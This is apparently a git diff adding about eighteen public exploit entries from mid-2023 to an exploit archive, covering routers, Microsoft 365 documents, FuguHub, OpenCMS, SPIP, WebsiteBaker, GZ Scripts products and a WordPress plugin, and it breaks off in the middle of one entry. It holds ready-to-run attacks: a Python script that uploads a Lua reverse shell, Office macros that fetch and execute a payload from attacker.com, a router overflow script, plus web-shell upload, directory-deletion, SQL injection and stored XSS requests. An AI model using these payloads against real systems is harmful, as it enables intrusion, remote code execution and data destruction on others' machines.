diff --git a/exploits/hardware/dos/51561.py b/exploits/hardware/dos/51561.py
new file mode 100755
index 000000000..5fa565178
--- /dev/null
+++ b/exploits/hardware/dos/51561.py
@@ -0,0 +1,28 @@
+# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
+# Date: 2023-06-30
+# country: Iran
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : hardware
+# Dork : /userRpm/WanDynamicIpV6CfgRpm
+# Tested on: Windows/Linux
+# CVE : CVE-2023-36355
+
+import requests
+
+# Replace the IP address with the router's IP
+router_ip = '192.168.0.1'
+
+# Construct the URL with the vulnerable endpoint and parameter
+url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='
+
+# Replace the payload with a crafted payload that triggers the buffer overflow
+payload = 'A' * 5000 # Example payload, adjust the length as needed
+
+# Send the GET request with the crafted payload
+response = requests.get(url + payload)
+
+# Check the response status code
+if response.status_code == 200:
+ print('Buffer overflow triggered successfully')
+else:
+ print('Buffer overflow not triggered')
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51556.txt b/exploits/hardware/webapps/51556.txt
new file mode 100644
index 000000000..27ea24edd
--- /dev/null
+++ b/exploits/hardware/webapps/51556.txt
@@ -0,0 +1,33 @@
+# Exploit Title: D-Link DAP-1325 - Broken Access Control
+# Date: 27-06-2023
+# Exploit Author: ieduardogoncalves
+# Contact : twitter.com/0x00dia
+# Vendor : www.dlink.com
+# Version: Hardware version: A1
+# Firmware version: 1.01
+# Tested on:All Platforms
+
+
+1) Description
+
+Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
+
+
+IN MY CASE,
+Tested repeater IP: http://192.168.0.21/
+
+Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
+
+2) Proof of Concept
+
+Step 1: Go to
+Repeater Login Page : http://192.168.0.21/
+
+Step 2:
+Add the payload to URL.
+
+Payload:
+http://{ip}/cgi-bin/ExportSettings.sh
+
+Payload:
+https://github.com/eeduardogoncalves/exploit
\ No newline at end of file
diff --git a/exploits/java/webapps/51564.txt b/exploits/java/webapps/51564.txt
new file mode 100644
index 000000000..18cb43c3b
--- /dev/null
+++ b/exploits/java/webapps/51564.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
+# Date: 1/07/2023
+# Exploit Author: tmrswrr
+# Vendor Homepage: http://www.opencms.org
+# Software Link: https://github.com/alkacon/opencms-core
+# Version: v15.0
+
+
+POC:
+
+1 ) Login in demo page , go to this url
+https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
+2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload
+
+3 ) You will be see alert box
+
+POC:
+
+1 ) Go to this url , right click any png file, rename title section and write your payload :
+https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
+2 ) You will be see alert box , stored xss
+
+POC:
+
+1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file
+after save it
+
+svg file:
+
+
+
+
+
+
+2 ) When click this svg file you will be see alert button
\ No newline at end of file
diff --git a/exploits/multiple/remote/51552.txt b/exploits/multiple/remote/51552.txt
new file mode 100644
index 000000000..89de65ac0
--- /dev/null
+++ b/exploits/multiple/remote/51552.txt
@@ -0,0 +1,51 @@
+## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
+## Author: nu11secur1ty
+## Date: 04.17.2023
+## Vendor: https://www.microsoft.com/
+## Software: https://www.microsoft.com/en-us/microsoft-365/
+## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
+## CVE-2023-28285
+
+
+## Description:
+The attack itself is carried out locally by a user with authentication
+to the targeted system. An attacker could exploit the vulnerability by
+convincing a victim, through social engineering, to download and open
+a specially crafted file from a website which could lead to a local
+attack on the victim's computer. The attacker can trick the victim to
+open a malicious web page by using a malicious `Word` file for
+`Office-365 API`. After the user will open the file to read it, from
+the API of Office-365, without being asked what it wants to activate,
+etc, he will activate the code of the malicious server, which he will
+inject himself, from this malicious server. Emedietly after this
+click, the attacker can receive very sensitive information! For bank
+accounts, logs from some sniff attacks, tracking of all the traffic of
+the victim without stopping, and more malicious stuff, it depends on
+the scenario and etc.
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+The exploit server must be BROADCASTING at the moment when the victim
+hit the button of the exploit!
+
+[+]PoC:
+```cmd
+Sub AutoOpen()
+ Call Shell("cmd.exe /S /c" & "curl -s
+http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
+vbNormalFocus)
+End Sub
+```
+
+## FYI:
+The PoC has a price and this report will be uploaded with a
+description and video of how you can reproduce it only.
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)
+
+## Proof and Exploit
+[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)
+
+## Time spend:
+01:30:00
\ No newline at end of file
diff --git a/exploits/multiple/remote/51555.txt b/exploits/multiple/remote/51555.txt
new file mode 100644
index 000000000..b6a713ed9
--- /dev/null
+++ b/exploits/multiple/remote/51555.txt
@@ -0,0 +1,40 @@
+## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
+## Author: nu11secur1ty
+## Date: 06.27.2023
+## Vendor: https://www.microsoft.com/
+## Software: https://www.microsoft.com/en-us/microsoft-365/excel
+## Reference: https://portswigger.net/daily-swig/rce
+## CVE-2023-33137
+
+
+## Description:
+This exploit is connected with third part exploit server, which waits
+for the victim to call him and execute the content from him using the
+pipe posting method! This is absolutely a 0-day exploit! This is
+absolutely dangerous for the victims, who are infected by him!
+When the victim hit the button in the Excel file, it makes a POST
+request to the exploit server, and the server is responding back that
+way: He creates another hidden malicious file and executed it directly
+on the machine of the victim, then everything is disappeared, so
+nasty.
+
+STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!
+
+[+]Exploit:
+```vbs
+Sub AutoOpen()
+ Call Shell("cmd.exe /S /c" & "curl -s
+https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat
+> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
+End Sub
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)
+
+## Time spend:
+01:27:00
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51550.py b/exploits/multiple/webapps/51550.py
new file mode 100755
index 000000000..61720c16e
--- /dev/null
+++ b/exploits/multiple/webapps/51550.py
@@ -0,0 +1,136 @@
+# Exploit Title: FuguHub 8.1 - Remote Code Execution
+# Date: 6/24/2023
+# Exploit Author: redfire359
+# Vendor Homepage: https://fuguhub.com/
+# Software Link: https://fuguhub.com/download.lsp
+# Version: 8.1
+# Tested on: Ubuntu 22.04.1
+# CVE : CVE-2023-24078
+
+import requests
+from bs4 import BeautifulSoup
+import hashlib
+from random import randint
+from urllib3 import encode_multipart_formdata
+from urllib3.exceptions import InsecureRequestWarning
+import argparse
+from colorama import Fore
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+#Options for user registration, if no user has been created yet
+username = 'admin'
+password = 'password'
+email = 'admin@admin.com'
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
+parser.add_argument("-rp","--rport", help = "http port [Default 80]")
+parser.add_argument("-l","--lhost", help = "Your IP", required = True)
+parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
+args = parser.parse_args()
+
+LHOST = args.lhost
+LPORT = args.lport
+url = args.rhost
+if args.rport != None:
+ port = args.rport
+else:
+ port = 80
+
+def main():
+ checkAccount()
+
+def checkAccount():
+ print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
+ s = requests.Session()
+
+ # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
+ r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp")
+ soup = BeautifulSoup(r.content, 'html.parser')
+ search = soup.find('h1')
+
+ if r.status_code == 404:
+ print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port")
+ exit(0)
+
+ userExists = False
+ userText = 'User database already saved'
+ for i in search:
+ if i.string == userText:
+ userExists = True
+
+ if userExists:
+ print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
+ login(r,s)
+ else:
+ print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
+ createUser(r,s)
+ login(r,s)
+
+def createUser(r,s):
+ data = { email : email ,
+ 'user' : username ,
+ 'password' : password ,
+ 'recoverpassword' : 'on' }
+ r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
+ print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")
+
+def login(r,s):
+ print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")
+
+ data = {'ba_username' : username , 'ba_password' : password}
+ r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz
+
+ #Veryify login
+ login_Success_Title = 'Web-File-Server'
+ soup = BeautifulSoup(r.content, 'html.parser')
+ search = soup.find('title')
+
+ for i in search:
+ if i != login_Success_Title:
+ print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
+ exit(0)
+ print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")
+
+ exploit(r,s)
+
+def exploit(r,s):
+ #Find the file server, default is fs
+ r = s.get(f"https://{url}:443/fs/cmsdocs/")
+
+ code = r.status_code
+
+ if code == 404:
+ print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
+ exit(0)
+
+ print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
+
+ #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default
+ shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
+
+
+ file_content = f'''
+
Check ur nc listener on the port you put in
+
+
+
+
+ Wrong request method, goodBye!
+
+ '''
+
+ files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
+ r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
+
+ if r.text == 'ok' :
+ print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
+ r = s.get(f"https://{url}:443/rev.lsp")
+
+if __name__=='__main__':
+ try:
+ main()
+ except:
+ print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
\ No newline at end of file
diff --git a/exploits/php/webapps/51548.txt b/exploits/php/webapps/51548.txt
new file mode 100644
index 000000000..9eb7668ef
--- /dev/null
+++ b/exploits/php/webapps/51548.txt
@@ -0,0 +1,152 @@
+Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
+Version: 3.4.1
+Bugs: Multiple Stored XSS
+Technology: PHP
+Vendor URL: https://www.rukovoditel.net/
+Software Link: https://www.rukovoditel.net/download.php
+Date of found: 24-06-2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+ ###XSS-1###
+========================================
+steps:
+1. login to account
+2. create project (http://localhost/index.php?module=items/items&path=21)
+3. add task
+4. open task
+5. add comment as " "
+
+
+POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 241
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
+Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=
+
+===========================
+ ###XSS-2###
+===========================
+1.go to admin account
+2.go to configration => applicaton
+3.Copyright Text set as ""
+
+
+POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
+Content-Length: 2766
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/index.php?module=configuration/application
+Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="form_session_token"
+
+ju271AAoy1
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_NAME]"
+
+Rukovoditel
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"
+
+ffgsdfgsdfg
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
+
+ruko
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="APP_LOGO"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_LOGO]"
+
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
+
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="APP_FAVICON"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_FAVICON]"
+
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
+
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
+
+english.php
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_SKIN]"
+
+
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
+
+America/New_York
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
+
+10
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
+
+m/d/Y
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
+
+m/d/Y H:i
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
+
+2/./*
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
+
+0
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
+
+0
+-----------------------------12298384558648010343132232769
+Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
+
+0
+-----------------------------12298384558648010343132232769--
\ No newline at end of file
diff --git a/exploits/php/webapps/51549.py b/exploits/php/webapps/51549.py
new file mode 100755
index 000000000..c0f17e7f6
--- /dev/null
+++ b/exploits/php/webapps/51549.py
@@ -0,0 +1,28 @@
+# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
+# Date: 2023-06-23
+# country: Iran
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : webapps
+# Dork : /print.php?nm_member=
+# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
+# Tested on: Windows/Linux
+# CVE : CVE-2023-36346
+
+import requests
+import urllib.parse
+
+# Set the target URL and payload
+url = "http://example.com/print.php"
+payload = ""
+
+# Encode the payload for URL inclusion
+payload = urllib.parse.quote(payload)
+
+# Build the request parameters
+params = {
+ "nm_member": payload
+}
+
+# Send the request and print the response
+response = requests.get(url, params=params)
+print(response.text)
\ No newline at end of file
diff --git a/exploits/php/webapps/51551.txt b/exploits/php/webapps/51551.txt
new file mode 100644
index 000000000..67434bd28
--- /dev/null
+++ b/exploits/php/webapps/51551.txt
@@ -0,0 +1,55 @@
+# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
+# Date: 25-05-2023
+# Exploit Author: yuyudhn
+# Vendor Homepage: https://www.codekop.com/
+# Software Link: https://github.com/fauzan1892/pos-kasir-php
+# Version: 2.0
+# Tested on: Linux
+# CVE: CVE-2023-36348
+# Vulnerability description: The application does not sanitize the filename
+parameter when sending data to /fungsi/edit/edit.php?gambar=user. An
+attacker can exploit this issue by uploading a PHP file and accessing it,
+leading to Remote Code Execution.
+# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/
+
+# Proof of Concept:
+1. Login to POS Codekop dashboard.
+2. Go to profile settings.
+3. Upload PHP script through Upload Profile Photo.
+
+Burp Log Example:
+```
+POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
+Host: localhost
+Content-Length: 8934
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+**Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-User: ?1**
+Sec-Fetch-Dest: document
+Referer: http://localhost/research/pos-kasir-php/index.php?page=user
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
+Connection: close
+
+------WebKitFormBoundarymVBHqH4m6KgKBnpa
+Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
+Content-Type: image/jpeg
+
+ÿØÿà JFIF HHÿþ6
+ÿÛC
+
+-----------------------------
+```
+PHP Web Shell location:
+http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php
\ No newline at end of file
diff --git a/exploits/php/webapps/51553.txt b/exploits/php/webapps/51553.txt
new file mode 100644
index 000000000..85b1e1839
--- /dev/null
+++ b/exploits/php/webapps/51553.txt
@@ -0,0 +1,32 @@
+Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
+Application: WebsiteBaker
+Version: 2.13.3
+Bugs: Stored XSS
+Technology: PHP
+Vendor URL: https://websitebaker.org/pages/en/home.php
+Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
+Date of found: 26.06.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. login to account
+2. go to media
+3. upload svg file
+
+"""
+
+
+
+
+"""
+4. go to svg file (http://localhost/media/malas.svg)
\ No newline at end of file
diff --git a/exploits/php/webapps/51554.txt b/exploits/php/webapps/51554.txt
new file mode 100644
index 000000000..6ce8e4182
--- /dev/null
+++ b/exploits/php/webapps/51554.txt
@@ -0,0 +1,30 @@
+Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
+Application: WebsiteBaker
+Version: 2.13.3
+Bugs: Directory Traversal
+Technology: PHP
+Vendor URL: https://websitebaker.org/pages/en/home.php
+Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
+Date of found: 26.06.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+=======================================
+
+arbitary directory deleting
+
+GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
+Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
\ No newline at end of file
diff --git a/exploits/php/webapps/51557.txt b/exploits/php/webapps/51557.txt
new file mode 100644
index 000000000..2fdbd4802
--- /dev/null
+++ b/exploits/php/webapps/51557.txt
@@ -0,0 +1,59 @@
+## Exploit Title: spip v4.1.10 - Spoofing Admin account
+## Author: nu11secur1ty
+## Date: 06.29.2023
+## Vendor: https://www.spip.net/en_rubrique25.html
+## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
+## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
+
+## Description:
+The malicious user can upload a malicious SVG file which file is not
+filtered by a security function, and he can trick
+the administrator of this system to check his logo by clicking on him
+and visiting, maybe a very dangerous URL.
+Wrong web app website logic, and not well sanitizing upload function.
+
+STATUS: HIGH- Vulnerability
+
+[+]Exploit:
+```SVG
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)
+
+## Time spend:
+00:37:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51558.txt b/exploits/php/webapps/51558.txt
new file mode 100644
index 000000000..478cbbe4c
--- /dev/null
+++ b/exploits/php/webapps/51558.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS
+# Date: 29/06/2023
+# Exploit Author: CraCkEr
+# Vendor: GZ Scripts
+# Vendor Homepage: https://gzscripts.com/
+# Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html
+# Version: 1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Release Notes:
+
+Allow Attacker to inject malicious code into website, give ability to steal sensitive
+information, manipulate data, and launch additional attacks.
+
+
+
+## Stored XSS
+
+-----------------------------------------------
+POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1
+
+promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1
+-----------------------------------------------
+
+POST parameter 'first_name' is vulnerable to XSS
+POST parameter 'second_name' is vulnerable to XSS
+POST parameter 'phone' is vulnerable to XSS
+POST parameter 'address_1' is vulnerable to XSS
+POST parameter 'country' is vulnerable to XSS
+
+
+## Steps to Reproduce:
+
+1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking]
+2. Inject your [XSS Payload] in "First Name"
+3. Inject your [XSS Payload] in "Last Name"
+4. Inject your [XSS Payload] in "Phone"
+5. Inject your [XSS Payload] in "Address Line 1"
+6. Inject your [XSS Payload] in "Country"
+
+
+7. Accept with terms & Press [Booking]
+ XSS Fired on Local User Browser
+
+8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
+ XSS Will Fire and Executed on his Browser
+
+9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
+ XSS Will Fire and Executed on his Browser
+
+10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)
+ XSS Will Fire and Executed on his Browser
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51559.txt b/exploits/php/webapps/51559.txt
new file mode 100644
index 000000000..0ea990109
--- /dev/null
+++ b/exploits/php/webapps/51559.txt
@@ -0,0 +1,73 @@
+# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
+# Date: 30/06/2023
+# Exploit Author: CraCkEr
+# Vendor: GZ Scripts
+# Vendor Homepage: https://gzscripts.com/
+# Software Link: https://gzscripts.com/gz-forum-script.html
+# Version: 1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+## Release Notes:
+
+Reflected XSS:
+
+The attacker can send to victim a link containing a malicious URL in an email or
+instant message can perform a wide variety of actions, such as stealing the victim's
+session token or login credentials
+
+Stored XSS
+Allow Attacker to inject malicious code into website, give ability to steal sensitive
+information, manipulate data, and launch additional attacks.
+
+## Reflected XSS
+Path: /preview.php
+
+GET 'catid' parameter is vulnerable to RXSS
+
+http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a
+
+
+Path: /preview.php
+
+GET 'topicid' parameter is vulnerable to RXSS
+
+http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2
+
+## Stored XSS
+-----------------------------------------------
+POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1
+
+-----------------------------39829578812616571248381709325
+Content-Disposition: form-data; name="free_name"
+
+
+-----------------------------39829578812616571248381709325
+Content-Disposition: form-data; name="topic"
+
+
+-----------------------------39829578812616571248381709325
+Content-Disposition: form-data; name="topic_message"
+
+
+-----------------------------39829578812616571248381709325--
+
+-----------------------------------------------
+
+POST parameter 'free_name' is vulnerable to XSS
+POST parameter 'topic' is vulnerable to XSS
+POST parameter 'topic_message' is vulnerable to XSS
+
+
+## Steps to Reproduce:
+
+1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)
+2. Inject your [XSS Payload] in "Name"
+3. Inject your [XSS Payload] in "Topic Title "
+4. Inject your [XSS Payload] in "Topic Message"
+5. Submit
+
+4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on
+
+5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)
+6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
\ No newline at end of file
diff --git a/exploits/php/webapps/51560.txt b/exploits/php/webapps/51560.txt
new file mode 100644
index 000000000..4383c9ba0
--- /dev/null
+++ b/exploits/php/webapps/51560.txt
@@ -0,0 +1,24 @@
+# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
+# Date: 30/06/2023
+# Exploit Author: Matin nouriyan (matitanium)
+# Version: <= 1.0.4
+# CVE: CVE-2022-4297
+Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
+# Tested on: Kali linux
+
+---------------------------------------
+
+
+The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
+and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
+leading to an unauthenticated SQL injection
+
+--------------------------------------
+
+How to Reproduce this Vulnerability:
+
+1. Install WP AutoComplete <= 1.0.4
+2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
+3. Find requests belong to WP AutoComplete like step 5
+4. Start sqlmap and exploit
+5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
\ No newline at end of file
diff --git a/exploits/php/webapps/51562.txt b/exploits/php/webapps/51562.txt
new file mode 100644
index 000000000..ae9e979a2
--- /dev/null
+++ b/exploits/php/webapps/51562.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
+# Date: 30/06/2023
+# Exploit Author: CraCkEr
+# Vendor: GZ Scripts
+# Vendor Homepage: https://gzscripts.com/
